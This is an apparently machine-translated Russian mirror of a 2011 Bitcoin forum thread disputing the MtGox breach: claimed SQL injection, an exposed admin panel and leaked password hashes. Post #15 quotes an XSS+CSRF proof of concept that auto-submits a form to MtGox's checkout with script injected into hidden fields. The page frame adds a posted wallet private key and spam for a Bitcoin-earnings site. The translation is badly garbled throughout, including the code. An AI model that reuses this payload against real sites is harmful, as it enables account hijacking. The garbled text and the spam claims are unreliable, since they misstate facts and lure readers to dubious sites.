[Полное раскрытие] Скорее MtGox Post-Mortem | Биткоин форум

		Биткоин Форум > Bitcoin Обсуждение
[Полное раскрытие] Скорее MtGox Post-Mortem

21 июня 2011, 4:35:20 AM	# 1
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Взлом Биткоин адресов. 500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome" Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e подробнее... Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru Более полное раскрытие! Больше удовольствия! У меня есть два независимых источника, утверждающих известные SQLI уязвимости в MtGox. Один из указанных SQLI vulnerabilties было подтверждено, что заплата на 16-ом. Другой не был исправлен, к чьему знаний, в момент аварии рынка и утечки базы данных. Тот, который не был исправлен мог бы правдоподобно были использованы для дампа таблицы пользователя. Подробности следуют в этих журналах чатов. POC для ссылочного XSS + CSRF также предоставляется. Является ли он по-прежнему является проблемой не известно наверняка, в это время, как сайт не может получить доступ. Кроме того, было установлено, что MtGox выставляет это админ интерфейс пользователя, даже если пользователь не установлен флаг администратора на их счет. В настоящее время считается, что большинство действий пытались использовать бросят ошибки разрешения. Еще раз. Это не может быть подтверждено в это время. https://mtgox.com/app/webroot/code/admin MagicalTux, теперь, когда ваши претензии "Сайт не был скомпрометирован с инъекции SQL, как многие сообщают, так что в действительности сайт не был взломан." Пожалуйста ответьте. Правда в этот раз. Официальный ответ MagicalTux на момент написания этой статьи также прилагается. Он доступен по адресу: https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback Эти журналы не будут изменены, за исключением маски хостов пользователя по их просьбе из-за новой найденной политики MagicalTux в совершении клеветы против своих пользователей на основе журналов входа, так как он, по-видимому, не держать книги журналы заказов для заказов, которые проходят сразу, по его собственному признанию , Классный. Зеркала: http://privatepaste.com/93e8a9cd64 (# Bitcoin-Hax журнал) http://privatepaste.com/47a50cab5b (Сиг) http://www.mediafire.com/?m7o4z3oz9nyd3v3 (# Bitcoin-Hax журнал) http://www.mediafire.com/?nzcpa5mwpw9ccbb (Сиг) http://privatepaste.com/e4bacfae37 (Журнал PovAddict) http://privatepaste.com/9dc5daf8a0 (Сиг) http://www.mediafire.com/?bflr76anvv835ib (Журнал PovAddict) http://www.mediafire.com/?rl250c2dahw7dx9 (Сиг) http://privatepaste.com/6dad3927d6 (XSS + CSRF) http://privatepaste.com/45e5aa0d30 (Сиг) http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF) http://www.mediafire.com/?uv7be34198pseoo (Сиг) ф-д: http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081582.html Сообщение ожидает одобрения на Bitcoin-лист и списки Bitcoin-развития. Edit: SourceForge ссылка списка (приложение меньше ответов) http://sourceforge.net/mailarchive/forum.php?thread_name=D091767C-EF92-4B63-9C29-924F32AE34D7%40jrbobdobbs.org&FORUM_NAME = Bitcoin-разработка

Как заработать Биткоины?
Без вложений. Не майнинг.

21 июня 2011, 4:44:33 AM	# 2
gmaxwell Сообщения: 2366 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Получил 1806 Биткоинов Реальная история. Не упоминается здесь является тот факт, что десятки MTGOX хэшируются пароли тихо раскрыты на хэша крекинг форум Пт июн 17, 2011 5:21 утра (http://forum.insidepro.com/viewtopic.php?t=9124&postdays = 0&postorder = возрастанию&начать = 75&ИСС = 1a9e31567fe815c0eea63c40c39fb707 вывесить "Джордж Клуни") Так как подавляющее большинство, но не все хэши совпадают базы данных mtgox, который был размещен на этом форуме (теперь удалены) и в других местах, я подозреваю, что этот пост может быть создана из ранее отвала, чем была раскрыта на форумах и везде после большое событие. Это, как представляется, значительно опережает ранее заявленное нарушение, и согласуются с очень много других пользователей mtgox утверждают, что их счета были ограблены до большого события в воскресенье, который я считаю, был бы слишком рано, чтобы результаты mtgox утечка базы данных в соответствии с официальной шкалой вновь: аудиторский компромисс.

21 июня 2011, 4:50:05 AM	# 3
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: gmaxwell от 21 июня 2011 года, 4:44:33 AM Не упоминается здесь является тот факт, что десятки MTGOX хэшируются пароли тихо раскрыты на хэша крекинг форум Пт июн 17, 2011 5:21 утра (http://forum.insidepro.com/viewtopic.php?t=9124&postdays = 0&postorder = возрастанию&начать = 75&ИСС = 1a9e31567fe815c0eea63c40c39fb707 вывесить "Джордж Клуни") Так как подавляющее большинство, но не все хэши совпадают базы данных mtgox, который был размещен на этом форуме (теперь удалены) и в других местах, я подозреваю, что этот пост может быть создана из ранее отвала, чем была раскрыта на форумах и везде после большое событие. Это, как представляется, значительно опережает ранее заявленное нарушение, и согласуются с очень много других пользователей mtgox утверждают, что их счета были ограблены до большого события в воскресенье, который я считаю, был бы слишком рано, чтобы результаты mtgox утечка базы данных в соответствии с официальной шкалой вновь: аудиторский компромисс. Упс, забыл добавить, что. В дополнение к ф-й нити.

21 июня 2011, 4:54:41 AM	# 4
chuckypalumbo Сообщения: 151 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: gmaxwell от 21 июня 2011 года, 4:44:33 AM Не упоминается здесь является тот факт, что десятки MTGOX хэшируются пароли тихо раскрыты на хэша крекинг форум Пт июн 17, 2011 5:21 утра (http://forum.insidepro.com/viewtopic.php?t=9124&postdays = 0&postorder = возрастанию&начать = 75&ИСС = 1a9e31567fe815c0eea63c40c39fb707 вывесить "Джордж Клуни") Так как подавляющее большинство, но не все хэши совпадают базы данных mtgox, который был размещен на этом форуме (теперь удалены) и в других местах, я подозреваю, что этот пост может быть создана из ранее отвала, чем была раскрыта на форумах и везде после большое событие. Это, как представляется, значительно опережает ранее заявленное нарушение, и согласуются с очень много других пользователей mtgox утверждают, что их счета были ограблены до большого события в воскресенье, который я считаю, был бы слишком рано, чтобы результаты mtgox утечка базы данных в соответствии с официальной шкалой вновь: аудиторский компромисс. Иисус Христос.....

21 июня 2011, 5:02:58 AM	# 5
Phil21 Сообщения: 154 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Люди должны читать это. Все это, даже если это скучно вам. Это то, что профессиональные команды безопасности делают. Они не винят своих пользователей для взлома, что не произошло в первую очередь (читай: пароль учетной записи пользователя компрометации всего, не был 500k распродажи - по крайней мере, сам по себе) Как я уже говорил в предыдущих постах, правда выйдет в одну сторону или другую. MT утверждая, что его сайт "безопасно" в значительной степени была надпись на стене в этой связи Я сделал много глупых ошибки безопасности задницы я полностью стесняется признаться. Тем не менее, я также признал свои ошибки и сделал сознательные усилия, чтобы улучшить каждый раз, когда я узнаю о чем-то новом.

21 июня 2011, 5:06:25 AM	# 6
joepie91 Сообщения: 294 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem _{Я сказал вам, так что ...}

21 июня 2011, 5:16:47 AM	# 7
Крючок ^ Сообщений: 56 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: joepie91 от 21 июня 2011 года, 5:06:25 AM _{Я сказал вам, так что ...} Говори, я тебя не слышу.
<Класс IMG = "inlineimg отчет спрайт-ш" SRC = "/ сор-содержание / темы / стена / bit_styles / clear.gif" альт = "Пожаловаться на Hook ^" граница = "0" название = "Пожаловаться на Hook ^" >	<Класс IMG = "спрайт-ш quickreply" SRC = "/ сор-содержание / темы / стена / bit_styles / clear.gif" альт = "Быстрый ответ на сообщение Hook ^" граница = "0" название = "Быстрый ответ на сообщение крюк ^ ">

21 июня 2011, 5:20:59 AM	# 8
nhodges Сообщения: 322 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Я думаю, что это просто глазурь на торте, но сейчас нет утверждения о скандале в Mt. GOx, это факт.

21 июня 2011, 5:23:49 AM	# 9
dana.powers Сообщений: 21 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Спасибо за сообщение. Теория кажется достоверной и, по крайней мере, очень интересно читать. Вопрос: какова была цель https://mtgox.com/claim ?

21 июня 2011, 5:24:28 AM	# 10
Bit_Happy Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: nhodges от 21 июня 2011 года, 5:20:59 AM Я думаю, что это просто глазурь на торте, но сейчас нет утверждения о скандале в Mt. GOx, это факт. Факт? Какие принадлежат ему два независимых источника, и почему они могут доверять? В точку как посланная ссылка доказать что-либо, в простом, простой английский язык, так что каждый может понять, пожалуйста?

21 июня 2011, 5:25:59 AM	# 11
Bit_Happy Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: dana.powers от 21 июня 2011 года, 5:23:49 AM Спасибо за сообщение. Теория кажется достоверной и, по крайней мере, очень интересно читать. Вопрос: какова была цель https://mtgox.com/claim ? Претензия = Re-требовать своего счета. Проверьте вашу электронную почту и изменить пароль.

21 июня 2011, 5:26:28 AM	# 12
niemivh Сообщения: 196 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Слава богу у меня только немного моей BTC на MtGox. Я предполагаю, что это учит нас не все используют один централизованный сайт, который используется для продажи Magic The Gathering карты. Нам нужно около десятка бирж каждый с надежной безопасности и FDIC страхования.

21 июня 2011, 5:29:57 AM	# 13
Brunner Сообщений: 14 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Я согласен, что каждый должен прочитать это. Таким образом, предполагая, что один «пользователь» с 500k BTC был MagicalTux, или кто-то рядом с ним: 1) GOx начинает с швейцарским сыром для безопасности 2) GOx игнорирует все предупреждения о том, уязвима, и продолжает рассказывать пользователям, что они безопасны 3) GOx получает взломан 4) BTC Magical Тукс получает продан за гроши 5) Magical Tux хочет откат транзакции, чтобы получить его обратно Bitcoin Я что-то упускаю?

21 июня 2011, 5:33:03 AM	# 14
Крючок ^ Сообщений: 56 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: Brunner от 21 июня 2011 года, 5:29:57 AM Я согласен, что каждый должен прочитать это. Таким образом, предполагая, что один «пользователь» с 500k BTC был MagicalTux, или кто-то рядом с ним: 1) GOx начинает с швейцарским сыром для безопасности 2) GOx игнорирует все предупреждения о том, уязвима, и продолжает рассказывать пользователям, что они безопасны 3) GOx получает взломан 4) BTC Magical Тукс получает продан за гроши 5) Magical Tux хочет откат транзакции, чтобы получить его обратно Bitcoin Я что-то упускаю? Magical Tux, вероятно, не 500k BTC. Может быть, все на месте комбинированный будет добавить до 500k BTC. Я думаю, что каждый Bitcoin на сайте был ликвидирован. Таким образом, он подпирает его. Проблема в том, был ли монеты переданы прежде, чем он поймал сделку.
<Класс IMG = "inlineimg отчет спрайт-ш" SRC = "/ сор-содержание / темы / стена / bit_styles / clear.gif" альт = "Пожаловаться на Hook ^" граница = "0" название = "Пожаловаться на Hook ^" >	<Класс IMG = "спрайт-ш quickreply" SRC = "/ сор-содержание / темы / стена / bit_styles / clear.gif" альт = "Быстрый ответ на сообщение Hook ^" граница = "0" название = "Быстрый ответ на сообщение крюк ^ ">

21 июня 2011, 5:33:18 AM	# 15
Bit_Happy Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: jrmithdobbs от 21 июня 2011 года, 4:35:20 AM .... http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF) IMO, Любой начиная пост, как это должно быть в состоянии продемонстрировать где именно нападение часть этого кода: Код: <Тело OnLoad ="/document.forms['foo'].submit()/"> <Форма ID ="Foo" действие ="https://mtgox.com/merch/checkout" метод ="после" > <тип входного ="скрытый" имя ="notify_url" значение ="http://yourdomain.com/ipn.php&Quot;})} оповещения (1); функция бла () {тест ({5:&Quot;"> <тип входного ="скрытый" имя ="бизнес" значение ="Foobar"> <тип входного ="скрытый" имя ="код валюты" значение ="доллар США"> <тип входного ="скрытый" имя ="название предмета" значение ="Ваше имя товара<скрипт>оповещение (1);"> <тип входного ="скрытый" имя ="обычай" значение ="Ваш заказ тзд к себе&Quot;})} оповещения (1); функция бла () {тест ({5:&Quot;" > <тип входного ="скрытый" имя ="количество" значение ="10,30"> <тип входного ="скрытый" имя ="вернуть" значение ="http://yourdomain.com/thanks"> <скрипт>">-> <тип входного ="Отправить" значение ="Оплатить с Mt GOx" /> Если вы можете показать мне (нам) "плохие части" и быть правильным, то спасибо за размещение этого. Если вы не можете, то (в лучшем случае), вы действуете, не думая вещи через. спасибо

21 июня 2011, 5:44:27 AM	# 16
привязывать Сообщения: 252 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem ... Или его все сфабриковано, чтобы сделать TradeHill выглядеть более безопасным в глазах членов этого форума. Единственная причина, почему я говорю, что возможность заключается в том, потому что, по их собственному признанию, они проверили все основные Bitcoin сайты и обмены на наличие уязвимостей, и ничего не сказал бог или плохо о них. Тем не менее, решили зонировать в на TradeHill как лучший с точки зрения безопасности, в то время как пренебрегая заявить, почему другие не заслуживают равного упоминания. Зачем? Если их безопасность была настолько плохой, что он не заслуживает того, чтобы быть взорван, как они mtgox? Если бы они имели хорошую безопасность бы они не заслуживают того, чтобы было mentioined как Tradehill? Плюс запрос уже TradeHill удалены из журналов вполне возможно дезинформация уловки, чтобы попытаться аннулировать возможность я только что упомянул. (Например, OMG, почему бы я попросить tradehill быть удалены, если я был удалившись за это?) Независимо от истины, он никогда не сможет быть "доказанный" так как, даже если все это правда, то отверстия будут подключены к тому времени mtgox идет в прямом эфире. Что то, что мы все хотим. Более безопасный рынок. (Минус драма, пожалуйста)

21 июня 2011, 5:46:23 AM	# 17
Bit_Happy Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: Bind от 21 июня 2011 года, 5:44:27 AM ... Или его все сфабриковано, чтобы сделать TradeHill выглядеть более безопасным в глазах членов этого форума. ... Привет Bind ссылку, Вы знаете, Tradehill находится на виртуальный хостинг? ЛОЛ!

21 июня 2011, 5:47:51 AM	# 18
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: Bind от 21 июня 2011 года, 5:44:27 AM ... Или его все сфабриковано, чтобы сделать TradeHill выглядеть более безопасным в глазах членов этого форума. Я не поддерживаю tradehill. Если прочитать весь журнал человека, который сделал замечание tradehill спросило, что они будут удалены из публикуемую журнала. Я отказался. Я не наглый лицемер. У меня нет учетной записи tradehill. Я не поддерживаю tradehill как обмен. Я никоим образом не связан с tradehill. Я думаю, что tradehill плохо для Bitcoin из-за их вопиющее пренебрежение к нам, финансовых законов и зависимость от третьего мира аутсорсинга разработчиков, работающих над закрытым исходным кодом программное обеспечение, которое не может быть публично проверяемого. Теперь, когда это вне пути, обратно к вашим регулярным хорошим временам!

21 июня 2011, 5:51:34 AM	# 19
Bit_Happy Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: jrmithdobbs от 21 июня 2011 года, 5:47:51 AM ... Теперь, когда это вне пути, обратно к вашим регулярным хорошим временам! Пожалуйста, ответьте на вопросы после # 10 и # 15, или вы их избежать?

21 июня 2011, 5:59:51 AM	# 20
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] Скорее MtGox Post-Mortem Цитата: Bit_Happy от 21 июня 2011 года, 5:51:34 AM Цитата: jrmithdobbs от 21 июня 2011 года, 5:47:51 AM ... Теперь, когда это вне пути, обратно к вашим регулярным хорошим временам! Пожалуйста, ответьте на вопросы после # 10 и # 15, или вы их избежать? # 15 не будет ответа. Это обычная практика, чтобы люди, которые не понимают этот вопрос на руке от использования эксплойта. # 10 не будет ответа. Если эти источники хотели быть названы они взяли бы меня на мое предложение GPG подписать журналы. Они боятся blamecannon MagicalTux становятся указали свой путь.

« Предыдущая тема | Следующая тема »

Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW